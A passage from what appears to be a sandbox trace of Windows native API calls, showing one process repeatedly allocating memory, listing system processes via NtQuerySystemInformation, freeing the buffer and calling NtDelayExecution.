RegionSize=0xdea54*=0x20000) returned 0x0 [0269.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.108] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.118] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.183] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.200] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.208] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0269.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0269.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0269.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0269.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0269.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0269.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0269.298] 